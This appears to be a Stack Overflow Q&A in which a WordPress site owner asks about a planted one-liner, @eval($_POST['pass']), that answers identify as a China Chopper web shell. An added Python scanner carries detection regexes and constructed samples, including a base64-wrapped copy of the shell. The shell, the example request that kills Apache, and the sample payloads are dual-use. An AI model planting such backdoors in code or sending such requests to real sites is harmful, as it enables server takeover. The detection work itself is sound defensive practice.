Found <?php @eval($_POST['pass']);?> code in wordpress site

Submitted by 吃可爱长大的小学妹 on 2019-12-10 19:43:30

Question


I found this code in one of my WordPress plugin sites. I guess it can be used with malicious intent, but what exactly does it do, and can I find out if it calls some other actions that I should be aware of?


Answer 1:


This PHP script belongs to the China Chopper hacking kit.

https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html




Answer 2:


Yes, it is very bad. I can't imagine any situation where this code could exist as part of harmless software.

This code essentially allows running any PHP code given by the pass get parameter. For example, calling this PHP as http://yoursite/your.php?pass=system("killall -9 apache"); will shut down your webserver. But it is usable for anything (including overwriting / extending your existing scripts to save the site passwords in a temporary file, and later getting this temporary file back).

It is probably a backdoor, and probably not the only one. Your site needs a deep security check.
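The answer above says to check the whole site, since one planted `eval` is rarely the only one. The scanner below is an added example (my own code, not from the question, the answers, or any WordPress or vendor tool) that walks a directory tree, flags PHP lines that feed request input or a decoded blob into `eval`/`assert`/`system`-style calls, reports which request key the shell reads (the `pass` in `$_POST['pass']`), and re-scans long base64 string literals so a one-layer-wrapped copy of the same one-liner does not slip past. The signature regexes, file names, and file contents are all constructed for the demonstration; the sample files are written to a temporary directory so it runs offline.

```python
import base64
import binascii
import re
import tempfile
from pathlib import Path

# Signatures for common PHP web-shell one-liners. These patterns are my own
# (assumption: not from the page or from any vendor feed). They are loose on
# purpose: they catch @eval($_POST['pass']) as found on the site, plus the
# usual variants that evaluate request input or a decoded payload.
SIGNATURES = {
    "eval_of_request_input": re.compile(
        r"\b(eval|assert)\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\s*\[", re.I),
    "exec_of_request_input": re.compile(
        r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(\s*"
        r"\$_(POST|GET|REQUEST|COOKIE)\s*\[", re.I),
    "eval_of_decoded_payload": re.compile(
        r"\b(eval|assert)\s*\(\s*"
        r"(base64_decode|gzinflate|gzuncompress|str_rot13|urldecode)\s*\(", re.I),
}

# Which request key a flagged line reads, e.g. ('POST', 'pass').
PARAM_RE = re.compile(r"\$_(POST|GET|REQUEST|COOKIE)\s*\[\s*['\"]([^'\"]+)['\"]\s*\]")
# Long base64-looking string literals, candidates for a wrapped payload.
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{16,}={0,2})['\"]")


def scan_source(text):
    """Return [(signature, line_no, stripped_line)] for every suspicious line."""
    hits = []
    for no, line in enumerate(text.splitlines(), start=1):
        for name, rx in SIGNATURES.items():
            if rx.search(line):
                hits.append((name, no, line.strip()))
    return hits


def shell_parameters(text):
    """Request keys read by flagged lines only, so benign $_POST use is ignored."""
    keys = set()
    for _, _, line in scan_source(text):
        for m in PARAM_RE.finditer(line):
            keys.add((m.group(1).upper(), m.group(2)))
    return sorted(keys)


def decoded_layers(text):
    """Base64-decode long literals and return those that are themselves a shell."""
    found = []
    for m in B64_LITERAL.finditer(text):
        try:
            inner = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            continue
        if scan_source(inner):
            found.append(inner)
    return found


def scan_tree(root):
    """Walk a directory (a WordPress install, say) and scan every PHP-like file."""
    results = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in {".php", ".phtml", ".php5", ".inc"}:
            hits = scan_source(path.read_text(errors="replace"))
            if hits:
                results[path.relative_to(root).as_posix()] = hits
    return results


# Constructed sample files (not real plugin code): the one-liner from the
# question appended to an otherwise benign plugin file, a base64-wrapped copy
# of the same payload, and a clean file that legitimately reads $_POST.
SAMPLE_FILES = {
    "wp-content/plugins/example/example.php":
        "<?php\n/* Plugin Name: Example */\nfunction example_init() { return 1; }\n?>\n"
        "<?php @eval($_POST['pass']);?>\n",
    "wp-content/uploads/2019/cache.php":
        "<?php $x = 'ZXZhbCgkX1BPU1RbJ3Bhc3MnXSk7'; eval(base64_decode($x)); ?>\n",
    "wp-content/plugins/example/admin.php":
        "<?php\nif (isset($_POST['title'])) { "
        "update_option('x', sanitize_text_field($_POST['title'])); }\n",
}


def demo():
    """Write the constructed samples to a temp dir and scan it; returns findings."""
    with tempfile.TemporaryDirectory() as tmp:
        for rel, body in SAMPLE_FILES.items():
            p = Path(tmp) / rel
            p.parent.mkdir(parents=True, exist_ok=True)
            p.write_text(body)
        return scan_tree(tmp)


if __name__ == "__main__":
    for rel, hits in demo().items():
        print(rel)
        for name, no, line in hits:
            print(f"  line {no}: {name}: {line}")
```

Point `scan_tree` at the document root of the affected site (run it from a clean host against a copy taken before anything is cleaned up, so the evidence survives). The line numbers matter because, as in the question, the shell is usually appended to a legitimate plugin or theme file rather than dropped as a file of its own; `shell_parameters` tells you which POST key to look for if you have request bodies captured, and `decoded_layers` is only a single-layer unwrap, so treat any long base64 literal next to an `eval` as suspect even if it does not decode to a match.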



Source: https://stackoverflow.com/questions/32672027/found-php-eval-postpass-code-in-wordpress-site
